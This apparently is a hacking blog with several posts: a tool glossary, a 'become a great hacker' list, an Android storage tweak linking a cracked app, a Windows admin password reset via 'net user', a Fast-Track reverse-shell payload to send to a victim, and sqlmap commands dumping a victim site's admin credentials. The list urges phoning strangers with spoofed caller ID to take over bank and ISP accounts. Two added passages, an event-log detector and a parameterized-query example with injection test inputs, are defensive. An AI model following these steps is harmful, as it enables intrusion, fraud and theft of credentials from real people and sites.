Friday 8 January 2016

Hacking Tools Categories.

These include various operating systems, such as:
  1. Kali Linux or Backtrack 5
  2. BackBox
  3. DEFT
  4. Pentoo
  5. NodeZero
  6. Anonymous OS 

In cryptanalysis and computer security, password cracking is the process of recovering passwords from data that have been stored in or transmitted by a computer system. A common approach (brute-force attack) is to try guesses repeatedly for the password and check them against an available cryptographic hash of the password.
The purpose of password cracking might be to help a user recover a forgotten password (installing an entirely new password is less of a security risk, but it involves System Administration privileges), to gain unauthorized access to a system, or as a preventive measure by System Administrators to check for easily crackable passwords. On a file-by-file basis, password cracking is utilized to gain access to digital evidence for which a judge has allowed access but the particular file's access is restricted.

Cracking of wireless networks is the defeating of security devices in wireless local-area networks. Wireless local-area networks (WLANs), also called Wi-Fi networks, are inherently vulnerable to security lapses that wired networks are exempt from.
Cracking is a kind of information network attack that is akin to a direct intrusion. There are two basic types of vulnerabilities associated with WLANs: those caused by poor configuration and those caused by weak encryption.

Packet crafting is a technique that allows network administrators to probe firewall rule-sets and find entry points into a targeted system or network. This is done by manually generating packets to test network devices and behavior, instead of using existing network traffic.



Network traffic monitoring is the process of reviewing, analyzing and managing network traffic for any abnormality or process that can affect network performance, availability and/or security.
It is a network management process that uses various tools and techniques to study computer network-based communication/data/packet traffic.


A packet analyzer (also known as a network analyzer, protocol analyzer or packet sniffer, or, for particular types of networks, an Ethernet sniffer or wireless sniffer) is a computer program or piece of computer hardware that can intercept and log traffic that passes over a digital network or part of a network.


A rootkit is an application that hides its presence, or the presence of another application, on the computer by using some of the lower layers of the operating system, which makes it almost undetectable by common anti-malware software. So a rootkit detector is used.


A security fuzzer is a tool used by security professionals (and professional hackers :) to test a parameter of an application. Typical fuzzers test an application for buffer overflows, format string vulnerabilities, and error handling. More advanced fuzzers incorporate functionality to test for directory traversal attacks, command execution vulnerabilities, SQL injection and cross-site scripting vulnerabilities. Web vulnerability scanners typically perform all of this functionality, and can be considered an advanced fuzzer.

A debugger or debugging tool is a computer program that is used to test and debug other programs (the "target" program). The code to be examined might alternatively be running on an instruction set simulator (ISS), a technique that allows great power in its ability to halt when specific conditions are encountered.

Encryption software is software that can encrypt and decrypt data, often in the form of files on a hard drive or packets sent over a network.

An intrusion detection system (IDS) is a device or software application that monitors network or system activities for malicious activities or policy violations and produces reports to a management station. IDS come in a variety of "flavors" and approach the goal of detecting suspicious traffic in different ways.


A software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. Such a vulnerability can be exploited using several tools like Metasploit, sqlmap, etc.


Web application vulnerability scanners are automated tools that scan web applications to look for known security vulnerabilities such as cross-site scripting, SQL injection, command execution, directory traversal and insecure server configuration. A large number of both commercial and open source tools are available, and all these tools have their own strengths and weaknesses.


Digital forensics (sometimes known as digital forensic science) is a branch of forensic science encompassing the recovery and investigation of material found in digital devices, often in relation to computer crime. Forensic tools help in collecting such data.


These include tools like Netcat, VMware, Socat, cURL, etc.



Thursday 7 January 2016

Becoming a Great Hacker (All you need to know)

So how do you become a great hacker? Well, read this, and more importantly implement these steps, and then you might be a renowned hacker of the upcoming era :D who knows?

1. Learn TCP/IP, Basic Information gathering, Proxies, Socks, SSL, VPN, VPS, RDP, FTP, POP3, SMTP, Telnet, SSH.

2. Learn Linux, Unix, Windows - You can do this using VMware or any virtual desktop utility.

3. Learn a programming language that's compatible with all OS - Perl, Python, C, ASM

4. Learn HTML, PHP, Javascript, ASP, XML, SQL, XSS, SQLI, RFI, LFI

5. Learn Reverse engineering and crack some programs for serials easy ones like mirc, winzip, winrar or old games.

6. Code a fuzzer for common protocols - ftp, pop3, 80, 8080 - Pick some free software like ftp server, mail server, apache or iis webserver or a webserver all-in-one pack, or teamspeak, ventrilo, mumble.

7. Code a tool that uses grep to sort out unique code in source codes.

8. Make a custom iptables or IPsec firewall that blocks all incoming and outgoing traffic, then add filters to accept only the ports that your software or scripts use.

9. Pick a kernel in Linux or Unix, and also pick a Microsoft OS version, let's say WinXP Pro SP2. Put them on the virtual desktops (VMware) and find and code a new local exploit in those versions, then install an Apache webserver on the Linux/Unix and an IIS webserver on the WinXP Pro and attempt to find and code a new local reverse_tcp_shell exploit.

10. Learn Cisco Router and Switch configuration and setup.

11. Learn Checkpoint Setup and Config

12. Learn WiFi scanning, cracking, sniffing.

13. Pick a person in your phone book for the area code you live in or city then ring the person on an anonymous line like Skype or a payphone or a carded sim and attempt to social engineer the person for his name, address, date of birth, city born, country born, ISP connected with, Phone company connected with, What bank he/she uses and anything else you can get. Then attempt to ring using a spoof caller ID software with the person's phone number - call the ISP and try to reset the password to his/her internet connection/web-mail, get access to bank account or ask them to send out a new *** to a new address (drop) with a new pin, reset of phone company passwords.

14. Use your information gathering skills to get all the information off a website like a shop then use the spoof caller-id software or hack your phone to show a new number of the Web server's Tech Support number then ring the shop owner and try get the shop site password.

15. Do the same thing but attempt to use a web attack against a site or shop to gain admin access.

16. Once you have access, upload a shell and attempt to exploit the server to gain root using an exploit you coded, not someone else's exploit.

17. Make your own Linux Distro

18. Use your own Linux distro or a vanilla Linux with GNOME (not KDE). Keep it light on graphics so you learn to depend on the terminal, and start from scratch: install only the applications you will need for a blackbox (security test box) and make folders for fuzzers, exploits, scanners, etc. Then load them up with your own scripts and other tools (by this stage you shouldn't need to depend on other people's scripts).

19. Learn Mac OS X and attempt to gain access to a Mac OS X box, whether it be your own or someone else's.

20. Create a secure home network and secure your own systems with your own Security policies and firewall settings.

All this isn't overnight learning. It will take a nice 3 - 4 years to learn a bit of this and 5+ years to learn most of it, and even then you may need time to keep learning, as IT keeps changing every day.

As long as you're dedicated to learning you won't have any problems, and if you learn all that you should easily get a job in any company if you show proof that you can do these things (print out scripts that you made or put them on disc) to show the companies.

© Programmed Hackers ;)

Saturday 12 July 2014

Easiest way to Swap any Android's External sd and Internal. :)

Requirements :- 
  • A rooted Android (If your Android is not rooted then read this - Rooting Android )
  • Root Explorer
  • Some Brain.
These days, a lot of Android phones and tablets with internal storage of 1 Gigabyte or more are partitioned by default into two parts:
  • Phone's internal storage: Stores system apps and other system files.
  • Internal sdcard: Stores app data, and SD data in the case of heavy games. Basically it works the way a normal sdcard works on other phones that come with such partitions.


See the swapping magic


Guide: Swapping your internal and external sdcard


  • First of all, you must have a rooted Android, as mentioned earlier. If your Android is not rooted, then root it easily by following the steps given here: How to root your Android.
  • Now download and install Root Explorer. You can download the cracked version at: Root Explorer 3.1.7 apk
  • Open Root Explorer and go to this file, located at:
"/system/etc/vold.fstab"



  • Mount the directory as read and write (R/W).
  • Open "vold.fstab".
  • Look for these lines and make these changes:
  • "dev_mount sdcard /mnt/sdcard" and change it to "dev_mount sdcard /mnt/extsd"
  • "dev_mount extsd /mnt/extsd" and change it to "dev_mount extsd /mnt/sdcard"
Make sure that you only change the words "sdcard" and "extsd" and nothing else. This will show the internal memory as external memory and the external memory (SD card) as internal memory.
Once done, save this file and go back to Root Explorer.
  • A backup file named "vold.fstab.bak" will be automatically created. Delete this file by pressing and holding the file and selecting delete. Close the Root Explorer app.
  • Switch off the phone and switch it back on. Go to Settings, then Storage, and check internal storage. Your internal memory will become external card storage and external storage will become internal memory.


Ask me if you have any queries.


Sunday 23 February 2014

Changing Administrator Password using Command Prompt (CMD) !

After reading this post, you'll be able to change your (or anyone's) Administrator account password in Windows 7 without being asked for the previous one. Usually, to change a password, we go to User Accounts in Control Panel and then opt for changing the password. But Windows doesn't permit us to do so until we enter the previous password.

So it's clear that we can't change the password with this method, because the current password is also required here, which we don't know.
But the same thing becomes possible if we perform the same task through the Windows Command Prompt (CMD). In this method, we are not prompted to enter the current/old password. But for that, we first need to be logged in as an Administrator (see step 2 below); otherwise you will be shown an error message stating "System 5 Error". I don't want you to get this "System 5 Error", which is why I am focusing on this point. This hack is very easy; you only need to perform all my steps in the exact manner. If you still have any problem, you can drop your comments below this post.
The steps are as follows:
Step-1 :- Press Start, and search for CMD (Windows Command Prompt).
Step-2 :- Now right-click on CMD and select RUN AS ADMINISTRATOR (it's the most important step of this hack; otherwise "System 5 Error" will be shown in the end) and then click OK. Most users don't read the whole sentence and press Enter right after searching for CMD in this step. Those users get an error named "System 5 Error". So please don't press Enter directly on CMD.
This hack only works when you're logged in to the Administrator (or administrator-like) account. This hack needs Administrator (or administrator-like) privileges; otherwise it shows "System 5 Error". This hack is thus NOT POSSIBLE if you are logged in with the GUEST ACCOUNT.
Step-3 :- Now type the command NET USER and press ENTER. It will give you the names of all the user accounts existing on your computer.

Step-4 :- Here, in this pic, you are getting three names, which are Kamesh, Vaibhav and Guest. We are not at all interested in the Guest account for sure, so leave that. Now two accounts are left. One is Kamesh and the other is Vaibhav. Here, both accounts have admin privileges. In most cases the main admin account, which is 'Kamesh' here, is hidden. The other account, named 'Vaibhav' here, is shown, and it is an ADMIN-LIKE account. So this account also has full admin privileges. Because the only admin account visible here is 'Vaibhav', we will deal with this account in this process.
So now use our next command, which is net user Vaibhav *
Here, there's ONE SPACE between NET and USER as well as between Vaibhav and *
Step-5 :- Here you are. Now directly enter the new ADMINISTRATOR PASSWORD and press Enter, then confirm your new password and press Enter again. You will not see any ************* type of characters in the CMD window while you are typing your password. But don't worry: they are not visible, but they are typed. Re-type the same password at the Confirm Password prompt.
Step-6 :- You are done. Just type EXIT and then press ENTER to exit. That's all.
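
Because `net user <name> *` resets a password without the old one, the Security log is where such a reset shows up: event 4724 records a password reset (4723 is a change made with the old password), and event 4688 records process creation, with the command line when that auditing is enabled. The following is an added example, not part of the original post, that correlates the two over constructed sample records; the record layout, the `Time` key and the `helpdesk` account are assumptions.

```python
from datetime import datetime, timedelta

# Constructed records in the shape of a Security-log export. Field names
# follow the event schemas; "Time" is an assumed name for the timestamp.
EVENTS = [
    {"EventID": 4688, "Time": "2014-02-23T10:15:02", "SubjectUserName": "Vaibhav",
     "SubjectLogonId": "0x3e4a1", "NewProcessName": r"C:\Windows\System32\net.exe",
     "CommandLine": "net user Kamesh *"},
    {"EventID": 4724, "Time": "2014-02-23T10:15:11", "SubjectUserName": "Vaibhav",
     "SubjectLogonId": "0x3e4a1", "TargetUserName": "Kamesh"},
    {"EventID": 4723, "Time": "2014-02-23T11:02:40", "SubjectUserName": "Kamesh",
     "SubjectLogonId": "0x51b07", "TargetUserName": "Kamesh"},
    {"EventID": 4724, "Time": "2014-02-23T12:30:00", "SubjectUserName": "helpdesk",
     "SubjectLogonId": "0x7a2c9", "TargetUserName": "Guest"},
]

NET_BINARIES = {"net.exe", "net1.exe"}  # net.exe hands "user" off to net1.exe


def _ts(event):
    return datetime.fromisoformat(event["Time"])


def find_password_resets(events, window=timedelta(seconds=120)):
    """Return every 4724 (reset without the old password), annotated with
    the net.exe/net1.exe command line started in the same logon session
    shortly before it, when process auditing recorded one."""
    net_procs = [e for e in events if e["EventID"] == 4688
                 and e["NewProcessName"].rsplit("\\", 1)[-1].lower() in NET_BINARIES]
    findings = []
    for e in events:
        if e["EventID"] != 4724:
            continue  # 4723 (change with old password) is not a reset
        cmd = next((p["CommandLine"] for p in net_procs
                    if p["SubjectLogonId"] == e["SubjectLogonId"]
                    and timedelta(0) <= _ts(e) - _ts(p) <= window), None)
        findings.append({"time": e["Time"], "by": e["SubjectUserName"],
                         "target": e["TargetUserName"], "command": cmd})
    return findings


if __name__ == "__main__":
    for finding in find_password_resets(EVENTS):
        print(finding)
```

A reset with no matching command line was either made through another interface or on a host without command-line auditing; both are worth a look when the subject is not the account owner.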

Sunday 16 February 2014

Hacking A Computer Using Fastrack on Backtrack.

Requirements :

1. Backtrack 
2. IP address of victim.
3. Brain.

Now follow these steps :
1. Open Fastrack by clicking on Applications-->Backtrack-->Exploitation tools-->Network exploitation tools-->Fast-Track-->fasttrack-interactive.


2. Now after opening fastrack select the option Payload generator by typing 8 and hitting enter.



3. Now after that type 1 to select Windows Shell Reverse_TCP and hit enter.


4. Now after that type 2 to select shikata_ga_nai and hit enter.


5. Now after that enter the IP address of victim and hit enter.
6. Now you have to scan the IP address to get open ports. (Google regarding it)


7. If you get any open ports then enter them as in the image.
8. After that type 3 to select Executable and hit enter. This option will create an executable file in the directory filesystem-->pentest>exploit-->fasttrack-->payload.exe.
9. Now send the executable file to the victim, and when the victim opens this file you will be connected to the computer remotely.


Thursday 6 February 2014

SQL Injection Using SqlMap (Backtrack 5 R3)

Sqlmap is an automated pen testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over databases. It comes with a powerful detection engine, many niche features for the ultimate pen tester, and a broad range of switches lasting from database fingerprinting over data fetching from the database. This tool is best for beginners who have just entered the security field. It is an easy-to-use tool that makes SQL injection easy compared to manual SQL injection.
Follow these simple steps to hack a website using the Backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal



2. Now find the vulnerable site. (Well, I already have a vulnerable site.) You can search for vulnerable sites using Dorks. Google it!

3. Now type this command in the terminal and hit enter.
python sqlmap.py -u http://yourvictim’slink/index.php?id=4 --dbs

4. Now you will get the database name of the website.




Well, I got the two databases aj and information_schema; we will select the aj database.
5. Now get the tables of that database. For that you need to enter this command into your terminal and simply hit Enter.
python sqlmap.py -u http://yourvictim’slink/index.php?id=4 -D  (database name) --tables
6. Now we need to grab the tables from the aj database. Paste the command below and hit enter.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -D aj --tables

7. Now you will get the tables list which is stored in aj database.




8. Now let's grab the columns from the admin table.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin --columns

Now we got the columns, and we got username and password.
9. Now let's grab the passwords of the admin.
python sqlmap.py -u http://www.yourvictim’slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website!


Now just find the admin panel of the website and use a proxy/VPN when you are trying to log in to the website as an admin.
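
The flaw that sqlmap detects behind a URL like index.php?id=4 is a query built by pasting the id parameter into the SQL text. The following is an added example, not code from the original post, that shows such a lookup beside its parameterized form using Python's sqlite3; the table, the function names and the inputs are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for the site's database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO pages VALUES (4, 'News'), (5, 'Contact');
    """)
    return db


def page_vulnerable(db, raw_id):
    # Before: the id parameter is pasted into the SQL text, so the
    # database parses whatever the client sent as part of the query.
    sql = "SELECT id, title FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()


def page_hardened(db, raw_id):
    # After: reject anything that is not an integer, then bind the value
    # as a parameter so it can never change the query's structure.
    try:
        page_id = int(raw_id)
    except ValueError:
        return []
    sql = "SELECT id, title FROM pages WHERE id = ?"
    return db.execute(sql, (page_id,)).fetchall()


# Constructed inputs for a regression check: a normal request, one that
# alters the WHERE clause, and one that triggers a database error.
CONSTRUCTED_INPUTS = ["4", "4 OR 1=1", "four"]


def misbehaving_inputs(handler, db):
    """Inputs for which the handler raised a database error or returned
    more than the single row a page lookup should produce."""
    flagged = []
    for raw_id in CONSTRUCTED_INPUTS:
        try:
            rows = handler(db, raw_id)
        except sqlite3.Error:
            flagged.append(raw_id)  # SQL error surfaced to the caller
            continue
        if len(rows) > 1:
            flagged.append(raw_id)  # input changed the query's logic
    return flagged


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", misbehaving_inputs(page_vulnerable, db))
    print("hardened:  ", misbehaving_inputs(page_hardened, db))
```

The same check can run in a test suite against every handler that takes an id from the request, so a concatenated query is caught before deployment.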
